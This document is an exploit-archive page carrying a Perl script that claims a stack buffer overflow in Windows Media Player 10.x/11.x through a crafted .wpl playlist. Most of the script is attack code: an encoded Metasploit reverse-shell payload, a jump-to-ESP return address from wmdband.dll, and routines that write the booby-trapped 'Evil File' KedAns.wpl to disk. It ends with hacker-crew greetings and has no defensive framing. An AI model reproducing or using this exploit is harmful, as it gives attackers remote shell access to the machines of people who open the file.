ExploitFixes
[D] PERL : Windows Media Player 10.x (.wpl) Stack Buffer Overflow [Z] 2011-02-26 17:35:05
Inviato da: kedans

#!/usr/bin/perl


###
# Title : Windows Media Player 10.x (.wpl) Stack Buffer Overflow
# Author : KedAns-Dz
# E-mail : [email protected]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# Tested on : windows XP SP3 Français & Arabic
# Target : Windows Media Player 10.x & 11.x
###

# Note : This Exploit BOF is Special Greets to Member ' Overfolw ' From sec4ever.com

#START SYSTEM /[email protected]/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");

print "\n\n".
" ||========================================||\n".
" || ||\n".
" || Windows Media Player 10.x (.wpl) ||\n".
" || Stack Buffer Overflow ||\n".
" || Created BY KedAns-Dz ||\n".
" || ked-h(at)hotmail(dot)com ||\n".
" || ||\n".
" ||========================================||\n\n\n";
sleep(2);
print "\n";
print " [!] Please Wait Loading...\n";
# Payload Parameter (http://www.metasploit.com)
# windows/shell_reverse_tcp - 739 bytes
# Encoder: x86/alpha_mixed
# LHOST=127.0.0.1, LPORT=4444, ReverseConnectRetries=5, =>
my $payload =
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d" .
"\x38\x4e\x69\x47\x70\x43\x30\x45\x50\x45\x30\x4d\x59\x4a" .
"\x45\x45\x61\x48\x52\x43\x54\x4e\x6b\x50\x52\x50\x30\x4c" .
"\x4b\x51\x42\x46\x6c\x4e\x6b\x46\x32\x46\x74\x4c\x4b\x50" .
"\x72\x46\x48\x46\x6f\x4f\x47\x43\x7a\x51\x36\x46\x51\x49" .
"\x6f\x46\x51\x4f\x30\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x43" .
"\x32\x44\x6c\x47\x50\x4f\x31\x48\x4f\x46\x6d\x43\x31\x49" .
"\x57\x48\x62\x4c\x30\x51\x42\x42\x77\x4c\x4b\x50\x52\x42" .
"\x30\x4c\x4b\x43\x72\x45\x6c\x46\x61\x4a\x70\x4c\x4b\x43" .
"\x70\x43\x48\x4e\x65\x4b\x70\x42\x54\x50\x4a\x45\x51\x48" .
"\x50\x46\x30\x4e\x6b\x50\x48\x45\x48\x4e\x6b\x51\x48\x51" .
"\x30\x45\x51\x48\x53\x48\x63\x47\x4c\x43\x79\x4e\x6b\x47" .
"\x44\x4e\x6b\x46\x61\x4b\x66\x50\x31\x4b\x4f\x44\x71\x4f" .
"\x30\x4e\x4c\x49\x51\x4a\x6f\x46\x6d\x46\x61\x4f\x37\x46" .
"\x58\x4d\x30\x42\x55\x4a\x54\x46\x63\x43\x4d\x4c\x38\x47" .
"\x4b\x51\x6d\x44\x64\x44\x35\x49\x72\x43\x68\x4c\x4b\x50" .
"\x58\x45\x74\x47\x71\x48\x53\x51\x76\x4e\x6b\x46\x6c\x42" .
"\x6b\x4c\x4b\x42\x78\x47\x6c\x45\x51\x48\x53\x4e\x6b\x45" .
"\x54\x4c\x4b\x47\x71\x48\x50\x4f\x79\x42\x64\x44\x64\x47" .
"\x54\x51\x4b\x51\x4b\x43\x51\x50\x59\x43\x6a\x46\x31\x4b" .
"\x4f\x4d\x30\x50\x58\x43\x6f\x43\x6a\x4c\x4b\x45\x42\x48" .
"\x6b\x4e\x66\x43\x6d\x42\x48\x50\x33\x44\x72\x45\x50\x43" .
"\x30\x51\x78\x42\x57\x42\x53\x46\x52\x43\x6f\x50\x54\x43" .
"\x58\x42\x6c\x44\x37\x44\x66\x45\x57\x49\x6f\x48\x55\x48" .
"\x38\x4c\x50\x47\x71\x45\x50\x47\x70\x47\x59\x4b\x74\x51" .
"\x44\x42\x70\x42\x48\x44\x69\x4d\x50\x42\x4b\x43\x30\x49" .
"\x6f\x48\x55\x50\x50\x42\x70\x50\x50\x42\x70\x47\x30\x42" .
"\x70\x43\x70\x50\x50\x43\x58\x48\x6a\x44\x4f\x49\x4f\x4d" .
"\x30\x49\x6f\x4b\x65\x4e\x69\x48\x47\x42\x48\x43\x4f\x45" .
"\x50\x43\x30\x47\x71\x43\x58\x43\x32\x45\x50\x44\x51\x43" .
"\x6c\x4e\x69\x4a\x46\x51\x7a\x42\x30\x51\x46\x43\x67\x42" .
"\x48\x4d\x49\x4e\x45\x51\x64\x51\x71\x49\x6f\x4e\x35\x50" .
"\x68\x42\x43\x42\x4d\x42\x44\x47\x70\x4c\x49\x48\x63\x51" .
"\x47\x51\x47\x51\x47\x50\x31\x4b\x46\x51\x7a\x47\x62\x51" .
"\x49\x50\x56\x4d\x32\x49\x6d\x50\x66\x4f\x37\x42\x64\x46" .
"\x44\x45\x6c\x47\x71\x43\x31\x4c\x4d\x50\x44\x51\x34\x42" .
"\x30\x4a\x66\x43\x30\x43\x74\x50\x54\x42\x70\x43\x66\x43" .
"\x66\x51\x46\x47\x36\x46\x36\x42\x6e\x50\x56\x46\x36\x42" .
"\x73\x43\x66\x50\x68\x44\x39\x48\x4c\x47\x4f\x4b\x36\x4b" .
"\x4f\x48\x55\x4c\x49\x4b\x50\x50\x4e\x42\x76\x43\x76\x49" .
"\x6f\x50\x30\x42\x48\x43\x38\x4c\x47\x47\x6d\x43\x50\x49" .
"\x6f\x4e\x35\x4f\x4b\x4a\x50\x4d\x65\x4d\x72\x51\x46\x51" .
"\x78\x4d\x76\x4e\x75\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x47" .
"\x4c\x46\x66\x43\x4c\x45\x5a\x4b\x30\x49\x6b\x49\x70\x43" .
"\x45\x45\x55\x4d\x6b\x51\x57\x44\x53\x43\x42\x42\x4f\x51" .
"\x7a\x47\x70\x46\x33\x4b\x4f\x49\x45\x41\x41"; #_ End Payload _
# Parameter OverFlow =>
my $ret = pack('V',0x040c04b0) ; # Jump to ESP - from wmdband.dll
$A = "\x41" x 333 ;
$B = "\x42" x 333 ;
$C = "\x43" x 333 ;
my $buffer = "\x4b\x65\x64\x41\x6e\x73" x 500;
my $abc = $A."-".$B."-".$C ; # tid="{AAA...-BBB..-CCC...}" etc...
my $padding = "\x90" x 30;
# KedAns = [Payload_shell][RET:0x040c04b0][Padding][Buffer]
my $kedans = $payload.$ret.$padding.$buffer ; # 'SRC = ' << in here
# Parameter Evil File =>
my $wpl =
"\x3c\x3f\x77\x70\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31".
"\x2e\x30\x22\x3f\x3e\x0a\x3c\x73\x6d\x69\x6c\x3e\x0a\x20\x20\x20".
"\x20\x3c\x68\x65\x61\x64\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20".
"\x3c\x6d\x65\x74\x61\x20\x6e\x61\x6d\x65\x3d\x22\x47\x65\x6e\x65".
"\x72\x61\x74\x6f\x72\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x3d\x22".
"\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x20\x57\x69\x6e\x64\x6f\x77".
"\x73\x20\x4d\x65\x64\x69\x61\x20\x50\x6c\x61\x79\x65\x72\x20\x2d".
"\x2d\x20\x31\x31\x2e\x30\x2e\x35\x37\x32\x31\x2e\x35\x31\x34\x35".
"\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x6d\x65\x74".
"\x61\x20\x6e\x61\x6d\x65\x3d\x22\x41\x76\x65\x72\x61\x67\x65\x52".
"\x61\x74\x69\x6e\x67\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x3d\x22".
"\x37\x36\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x6d".
"\x65\x74\x61\x20\x6e\x61\x6d\x65\x3d\x22\x54\x6f\x74\x61\x6c\x44".
"\x75\x72\x61\x74\x69\x6f\x6e\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74".
"\x3d\x22\x33\x35\x31\x39\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20".
"\x20\x20\x3c\x6d\x65\x74\x61\x20\x6e\x61\x6d\x65\x3d\x22\x49\x74".
"\x65\x6d\x43\x6f\x75\x6e\x74\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74".
"\x3d\x22\x31\x37\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20".
"\x3c\x74\x69\x74\x6c\x65\x3e\x4b\x65\x64\x41\x6e\x73\x3c\x2f\x74".
"\x69\x74\x6c\x65\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x68\x65\x61\x64".
"\x3e\x0a\x20\x20\x20\x20\x3c\x62\x6f\x64\x79\x3e\x0a\x20\x20\x20".
"\x20\x20\x20\x20\x20\x3c\x73\x65\x71\x3e\x0a\x09\x09\x3c\x6d\x65".
"\x64\x69\x61\x20\x73\x72\x63\x3d\x27$kedans\x27\x20\x74\x69\x64\x3d".
"\x22\x7b$abc\x7d\x22\x2f\x3e\x0a\x20\x20\x20\x20".
"\x20\x20\x20\x20\x3c\x2f\x73\x65\x71\x3e\x0a\x20\x20\x20\x20\x3c".
"\x2f\x62\x6f\x64\x79\x3e\x0a\x3c\x2f\x73\x6d\x69\x6c\x3e\x0a";
# _ End Parameter File _
# >> Creating ...
open(FILE,'>>KedAns.wpl'); # Evil File (Windows.Play.List)
print FILE $wpl;
sleep (2);
print "\n [+] Creat Evil File Succesfully ! \n";
close(FILE);
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One
# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;
# > Algerians < [D] HaCkerS-StreeT-Team [Z] > Hackers <
# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others
# 4nahdha.com : TitO (Dr.Ride) * MEN_dz * Mr.LAK (Administrator) * all members ...
# sec4ever.com members Dz : =>>
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#===========================================================================